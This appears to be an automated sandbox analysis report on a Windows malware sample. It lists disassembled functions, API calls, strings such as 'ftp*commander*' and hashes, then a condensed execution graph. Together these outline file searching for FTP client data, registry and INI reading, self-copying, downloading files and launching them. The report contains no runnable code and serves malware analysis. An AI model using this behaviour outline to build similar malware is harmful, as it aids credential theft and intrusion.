                                                                                                                                                                                                                  • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                                                                                                                                                                                                                  • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                                                                                                                                                                                                                  • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                                                                                                                                                                                                                  • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                                                                                                                                                                                                                • String ID: #$&$ftp*commander*
                                                                                                                                                                                                                • API String ID: 3438805939-1149875651
                                                                                                                                                                                                                • Opcode ID: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                                                                                                                                                                                                                • Instruction ID: 4761086559ade70d73b1403ca51e5d3bc462c500c99379e4fd01d7d946a964d6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B61121B2901118BADB10AA92DC49EDF7F7CEF85704F00407AF609B6180E7799785CBA9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004094A9
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004094AE
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeString
                                                                                                                                                                                                                • String ID: _blank$an.yandex.ru/count
                                                                                                                                                                                                                • API String ID: 3341692771-25359924
                                                                                                                                                                                                                • Opcode ID: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                                                                                                                                                                                                                • Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$CreateCurrentDirectoryModuleName
                                                                                                                                                                                                                • String ID: \merocz.xc6
                                                                                                                                                                                                                • API String ID: 3818821825-505599559
                                                                                                                                                                                                                • Opcode ID: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                                                                                                                                                                                                                • Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00409868
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00409876
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocString
                                                                                                                                                                                                                • String ID: "URL"$"encrypted"
                                                                                                                                                                                                                • API String ID: 2525500382-4151690107
                                                                                                                                                                                                                • Opcode ID: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                                                                                                                                                                                                                • Instruction ID: 961e294ab5ae80d7ab2f0271a6faa46f3ea3f555f1d55132cdad114d364c87da
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62F0D671A0021DA7CF00AB69CC01FD637ECAB4438CF1484B6F904F32C1E974EA098B98
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004097ED
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004097FB
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocString
                                                                                                                                                                                                                • String ID: "domain"$"url"
                                                                                                                                                                                                                • API String ID: 2525500382-2438671658
                                                                                                                                                                                                                • Opcode ID: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                                                                                                                                                                                                                • Instruction ID: 610bf4d9b2292206f8ef054453b19a236663fc5a2da35db14ea77673b97cd822
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08F0A271A0021DA6CF41AAA9CC05FD637E8AB44348F1444B6F908F7281EA78EA188B94
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Open
                                                                                                                                                                                                                • String ID: Build$SOFTWARE\Microsoft\Internet Explorer$w,@
                                                                                                                                                                                                                • API String ID: 71445658-3061378640
                                                                                                                                                                                                                • Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                                                                                                                                                                                                                • Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                                                                                                                                                                                                                  • Part of subcall function 0040845D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000008,00000000,?,?,004084C5,?,?,?,00000008,?,00403796,?), ref: 00408475
                                                                                                                                                                                                                  • Part of subcall function 0040845D: RegCloseKey.ADVAPI32(?,?,004084C5,?,?,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408484
                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408524
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408534
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 0040853B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$CloseEnvironmentExpandFreeOpenProcessQueryStringsValue
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3604167287-0
                                                                                                                                                                                                                • Opcode ID: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                                                                                                                                                                                                                • Instruction ID: 704a8cbe2313c99ccb7bf4cac6d27c9c5720caa44ca6f9902b9fd9ccb38d811f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0521C871900626BBDF205B748E45ABF3668EF05328F10063EF561F22D0EB758D508658
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CharLowerW.USER32(00408E44,00000000,00000000,?,00408E44,00408795), ref: 004095A4
                                                                                                                                                                                                                • CharLowerW.USER32(00408795), ref: 004095D8
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00408795), ref: 00409608
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00408E44), ref: 0040960D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CharFreeLowerString
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2335467167-0
                                                                                                                                                                                                                • Opcode ID: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                                                                                                                                                                                                                • Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081A3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: -
• API String ID: 885266447-2547889144
• Opcode ID: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
• Instruction ID: cbf3f064ca1262f0759db58cdf0f181467b31290bd4ebff5f053a9a619aca6df
• Opcode Fuzzy Hash: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
• Instruction Fuzzy Hash: 58415D31D0422699CB2177B98E417BB61A9DF44758F1440BFF9C0B72C2EEBC5D8581AE

Execution Graph

Execution Coverage: 6.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 1147
Total number of Limit Nodes: 6
execution_graph (condensed from the report's flattened node/edge serialization, in which each node is written as `<id> <address> [API names]` and each edge as `<id>-><id>`; the routine addresses and API names below are the report's own, the numeric node ids are omitted, and the serialization is cut off at node 6639 / 4033a0 in the captured page)

• 404ec0, 403e18: PathCombineW (40821c); COM/BSTR helper 40c519 (CoCreateInstance at 40c4b4, VariantInit and SysAllocString at 40c531, VariantClear at 40c551); SysFreeString (40c5b9); wvnsprintfW (40bfa7); heap helper 40bde1 (HeapAlloc, HeapReAlloc, HeapFree)
• 408248 directory walk (reached from 404e7b, 4047cc, 403e18 and 403740): PathCombineW, FindFirstFileW (408272), PathMatchSpecW (408306), FindNextFileW (40839e), FindClose (4083b6), WaitForSingleObject (4082a2), Sleep (40833f, 408374)
• 40b346 (install path): GetModuleFileNameW (40b353, 40b394, 40b407, 40b4cf); RegOpenKeyExW, RegQueryValueExW, RegCloseKey (40ac20, 4069c0); RegCreateKeyExW, RegSetValueExW, RegCloseKey (4069fd, 406a39); CopyFileW (40b426); CreateProcessW (4077f0); ExitProcess (40b44c); ExpandEnvironmentStringsW (40b4b9); GetLastError (40b3ca, 40b48b, 40b498, 40b4fe); Sleep (40b3f2); OleInitialize (40b2ce)
• 40aafd, 40ab7c (command line and self-path checks): GetCommandLineW, GetModuleFileNameW, CharLowerW
• 40abd9: FindFirstFileW, FindClose
• 407727 / 4075d4 (self-copy and file rewrite): GetModuleFileNameW, ExpandEnvironmentStringsW, CreateFileW, GetFileSize, GetProcessHeap, HeapAlloc, ReadFile, WriteFile, SetFilePointer, CloseHandle, GetLastError
• 40a786, 40a8f9, 40ac93 (connectivity check and download loop): InternetAttemptConnect and InternetOpenW (406d14, 406d26); GetVersionExW (406cb5); Sleep; 4078cb (SetFilePointer and ReadFile at 407e2b; GetModuleFileNameW and CreateFileW at 40782a; GetFileTime and CloseHandle at 407871; GetTickCount at 407888); 407d61 (SetFilePointer, WriteFile); 407cd7 (GetModuleFileNameW, GetCurrentDirectoryW, CreateFileW); 406e69 (GetTickCount; 407267 with GetSystemTime, SystemTimeToFileTime, __aulldiv; 409c99 with InternetOpenUrlW, InternetReadFile, GetProcessHeap, HeapAlloc, HeapReAlloc, HeapFree); GetProcessHeap and HeapFree (40a8e1, 40aae5)
• 40b2ce (main loop after OleInitialize): InternetCloseHandle (40b325); Sleep (407552); 407362 timer wait (CreateWaitableTimerW, GetLocalTime, GetTimeZoneInformation, SystemTimeToFileTime, SetWaitableTimer, WaitForSingleObject, CloseHandle); 40b096 (InternetClearAllPerSiteCookieDecisions, InternetSetPerSiteCookieDecisionW, GetModuleFileNameW, GetCurrentDirectoryW, CreateThread, WaitForMultipleObjects, CloseHandle, GetLastError; 4032b8 with four RegOpenKeyExW calls, RegQueryValueExW, RegCreateKeyExW and three GetProcAddress calls at 403351; 40253c with Sleep, DeleteFileW, _memset and CreateProcessW; 407036 download-to-file with DeleteFileW, CreateFileW, SetEndOfFile, InternetOpenUrlW, InternetQueryDataAvailable, InternetReadFile, WriteFile, CloseHandle, InternetCloseHandle); 40a6c9 (InternetCloseHandle, ExitProcess)
• 401006, 401652: 407499 (GetLocalTime, GetTimeZoneInformation, SystemTimeToFileTime), Sleep (407552)
• 409402, 409445, 409a07, 409883, 409909, 40978d, 409a99, 409c6f, 409f99: BSTR and buffer helpers (SysAllocString, SysFreeString, __VEC_memcpy, Sleep)
• 403287 via 408604: RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetLastError, DeleteFileW (408682), RegCreateKeyExW
• 40ce08, 40cbd0, 40d2a4, 40d990 (CRT exception handling): __except_handler3, __except_handler4, @_EH4_CallFilterFunc@8, _CallDestructExceptionObject, _ValidateScopeTableHandlers, __FindPESection, IsDebuggerPresent (40cd70), SetUnhandledExceptionFilter and UnhandledExceptionFilter (40d0d6), GetCurrentProcess and TerminateProcess (40d0fb), RtlUnwind (40ce9a, 40d110), VirtualQuery, GetVersionExA
• 4047cc (file scan): PathCombineW, 408248, 4083c4 file mapping (CreateFileW, GetFileSizeEx, VirtualAlloc, ReadFile, VirtualFree, CloseHandle), HeapAlloc, four StrStrIA calls (40490c), wvnsprintfW (40c412), HeapFree
• 40350f (INI configuration read): PathCombineW, HeapAlloc, GetPrivateProfileStringW (403576, 403627, 403669, 40368b), GetPrivateProfileIntW (403643), wvnsprintfW, HeapFree
• 402dd5, 402d0e, 402c62 via 40267a ("122 API calls"): GetTickCount, Sleep, OleInitialize; 40a469 / 40a156 (CoInitialize, GetModuleHandleW, CreateWindowExW, GetForegroundWindow, CoCreateInstance, SetForegroundWindow, SysAllocString, FindWindowW, SetParent, GetWindowLongW, SetWindowLongW, SetWindowPos, InternetOpenW, InternetSetOptionW); 40a345 / 40a245 (_memset, SysAllocString, SysFreeString); message pumps 409fb1 and 409f2b (GetTickCount, PeekMessageW, DispatchMessageW, Sleep); 40a2d9 (GetProcessHeap, HeapFree, 409c99); 4072ed (GetSystemTime, SystemTimeToFileTime, __aulldiv); 408f26, 4089fd, 40920a, 409c49, 408825, 408692, 409301, 408cb7, 409581 (SysAllocString, SysFreeString, VariantClear, CharLowerW, GetTickCount, Sleep); 402c62 additionally 406c77 RegOpenKeyExW, GetVersionExW and 40a8f9
• 402214, 401c41: 408091 (__allrem, 407f4f via 4072ed), 407267
• 4053ea (heap setup): HeapCreate, GetProcessHeap; 403740 (40848f RegOpenKeyExW, ExpandEnvironmentStringsW, SHGetFolderPathW at 4037f6, 408248, HeapFree, 4033a0, 403c10 with 40848f, ExpandEnvironmentStringsW and HeapAlloc at 4039ea)
HeapFree 6636->6639 6637 403e0a 6640 40be3a HeapFree 6637->6640 6641 403e08 6639->6641 6640->6641 6652 4040e7 6641->6652 6642 403d18 SHGetFolderPathW 6642->6643 6643->6642 6645 408248 8 API calls 6643->6645 6646 403d88 6643->6646 6649 403df7 6643->6649 6777 4039a3 6643->6777 6645->6643 6647 40848f 7 API calls 6646->6647 6646->6649 6648 403dc8 6647->6648 6648->6649 6650 403dd4 ExpandEnvironmentStringsW 6648->6650 6649->6636 6649->6637 6651 4039a3 8 API calls 6650->6651 6651->6649 6656 404100 6652->6656 6653 40412c SHGetFolderPathW 6653->6656 6654 408248 8 API calls 6654->6656 6655 40416d 6657 404172 6655->6657 6658 40417c 6655->6658 6656->6653 6656->6654 6656->6655 6659 4033a0 HeapFree 6657->6659 6660 40be3a HeapFree 6658->6660 6661 40417a 6659->6661 6660->6661 6662 4041e4 HeapAlloc 6661->6662 6663 404212 6662->6663 6674 404453 6662->6674 6664 4042a0 RegOpenKeyExW 6663->6664 6665 40440f RegEnumKeyExW 6663->6665 6666 40443d 6663->6666 6675 40848f 7 API calls 6663->6675 6676 40435e RegOpenKeyExW 6663->6676 6677 40845d 2 API calls 6663->6677 6678 40c3f9 wvnsprintfW 6663->6678 6679 40c00b 3 API calls 6663->6679 6664->6663 6665->6663 6667 404427 RegCloseKey 6665->6667 6668 40be3a HeapFree 6666->6668 6667->6663 6669 404445 6668->6669 6670 404455 6669->6670 6671 40444b 6669->6671 6673 40be3a HeapFree 6670->6673 6672 4033a0 HeapFree 6671->6672 6672->6674 6673->6674 6680 40451b 6674->6680 6675->6663 6676->6663 6677->6663 6678->6663 6679->6663 6781 40be9d 6680->6781 6682 404535 HeapAlloc 6683 404786 6682->6683 6695 404555 6682->6695 6684 404796 6683->6684 6685 40478c 6683->6685 6687 40be3a HeapFree 6684->6687 6686 4033a0 HeapFree 6685->6686 6688 404794 6686->6688 6687->6688 6700 404a92 6688->6700 6689 4045c5 RegOpenKeyExW 6690 4045e8 RegEnumKeyExW 6689->6690 6689->6695 6690->6695 6691 404780 6692 40be3a HeapFree 6691->6692 6692->6683 6693 40476a RegCloseKey 6693->6695 6694 40848f 7 API calls 6694->6695 6695->6689 6695->6691 6695->6693 6695->6694 6696 40473d RegEnumKeyExW 
6695->6696 6698 40c3f9 wvnsprintfW 6695->6698 6699 40c00b 3 API calls 6695->6699 6782 40854c RegOpenKeyExW 6695->6782 6696->6695 6698->6695 6699->6695 6706 404aab 6700->6706 6701 404ad7 SHGetFolderPathW 6701->6706 6702 404b18 6704 404b27 6702->6704 6705 404b1d 6702->6705 6703 408248 8 API calls 6703->6706 6708 40be3a HeapFree 6704->6708 6707 4033a0 HeapFree 6705->6707 6706->6701 6706->6702 6706->6703 6709 404b25 6707->6709 6708->6709 6710 405136 6709->6710 6711 405150 6710->6711 6712 40848f 7 API calls 6711->6712 6713 4051e0 ExpandEnvironmentStringsW 6711->6713 6714 40520b 6711->6714 6712->6711 6715 404e7b 8 API calls 6713->6715 6716 405211 6714->6716 6717 40521b 6714->6717 6715->6711 6718 4033a0 HeapFree 6716->6718 6719 40be3a HeapFree 6717->6719 6720 405219 6718->6720 6719->6720 6721 405229 6720->6721 6722 405238 6721->6722 6723 407b4e 9 API calls 6722->6723 6724 4052e8 6723->6724 6725 406d14 2 API calls 6724->6725 6728 405361 Sleep 6724->6728 6731 405372 6724->6731 6725->6724 6726 40537c Sleep 6726->6731 6728->6724 6729 4053cb Sleep 6729->6731 6730 4053e0 6731->6726 6731->6729 6731->6730 6786 409df4 6731->6786 6733 4084af 6732->6733 6736 4084c5 6732->6736 6750 40845d RegQueryValueExW 6733->6750 6735 403796 6735->6619 6735->6627 6736->6735 6753 40bfd0 6736->6753 6738 408518 6739 40852e 6738->6739 6740 40851f ExpandEnvironmentStringsW 6738->6740 6741 408531 GetProcessHeap HeapFree 6739->6741 6740->6739 6740->6741 6741->6735 6743 4034bc 6742->6743 6744 408248 8 API calls 6743->6744 6745 40350a 6744->6745 6745->6627 6749 4033a4 6746->6749 6747 40be3a HeapFree 6748 4033d7 6747->6748 6748->6625 6749->6747 6751 408482 RegCloseKey 6750->6751 6752 40847f 6750->6752 6751->6736 6752->6751 6754 40bfd7 6753->6754 6755 40bfda 6753->6755 6754->6738 6756 40bff3 6755->6756 6759 40be27 HeapAlloc 6755->6759 6756->6738 6758 40bffa 6758->6738 6759->6758 6761 403bb9 PathRemoveFileSpecW 6760->6761 6762 403a1a GetPrivateProfileStringW 6760->6762 6761->6643 6763 403a36 6762->6763 6774 
403baf 6762->6774 6765 403a48 HeapAlloc 6763->6765 6763->6774 6764 40be3a HeapFree 6764->6761 6766 403a64 6765->6766 6765->6774 6767 403ac8 StrStrIW 6766->6767 6772 403ba9 6766->6772 6775 40c3f9 wvnsprintfW 6766->6775 6776 40c00b 3 API calls 6766->6776 6767->6766 6768 403add StrStrIW 6767->6768 6768->6766 6769 403af2 GetPrivateProfileStringW 6768->6769 6769->6766 6770 403b09 GetPrivateProfileStringW 6769->6770 6770->6766 6771 403b26 GetPrivateProfileStringW 6770->6771 6771->6766 6773 40be3a HeapFree 6772->6773 6773->6774 6774->6764 6775->6766 6776->6766 6778 4039b7 6777->6778 6779 408248 8 API calls 6778->6779 6780 4039e5 6779->6780 6780->6643 6781->6682 6783 40856f 6782->6783 6785 408585 6782->6785 6784 40845d 2 API calls 6783->6784 6784->6785 6785->6695 6787 409e01 6786->6787 6799 40beea 6787->6799 6791 409eb1 HttpOpenRequestW 6792 409ead 6791->6792 6793 409ecf HttpSendRequestW 6791->6793 6792->6731 6794 40be3a HeapFree 6793->6794 6795 409eea 6794->6795 6795->6792 6796 409eef InternetReadFile 6795->6796 6796->6792 6797 409f0c 6796->6797 6807 40bf35 6797->6807 6800 40bef4 6799->6800 6811 40beb4 6800->6811 6803 409e3e InternetConnectW 6803->6791 6803->6792 6805 40bf1c 6805->6803 6806 40beb4 WideCharToMultiByte 6805->6806 6806->6803 6808 40bf3a 6807->6808 6809 40bf3f MultiByteToWideChar 6807->6809 6808->6809 6810 40bf58 6809->6810 6810->6792 6812 40bec3 WideCharToMultiByte 6811->6812 6813 40bebe 6811->6813 6814 40bedd 6812->6814 6813->6812 6814->6803 6815 40be27 HeapAlloc 6814->6815 6815->6805 6993 40d2ac 6994 40d2ca 6993->6994 6996 40d378 __except_handler3 6993->6996 6995 40d790 __except_handler3 2 API calls 6994->6995 6997 40d2e5 __except_handler3 __except_handler4 _CallDestructExceptionObject 6995->6997 6997->6996 6998 40d110 __except_handler3 RtlUnwind 6997->6998 6998->6997 6999 402cad 7000 406c77 3 API calls 6999->7000 7001 402cc3 7000->7001 7002 406cb5 GetVersionExW 7001->7002 7003 402cc8 7002->7003 7004 40a8f9 34 API calls 7003->7004 7005 402cdb 7004->7005 
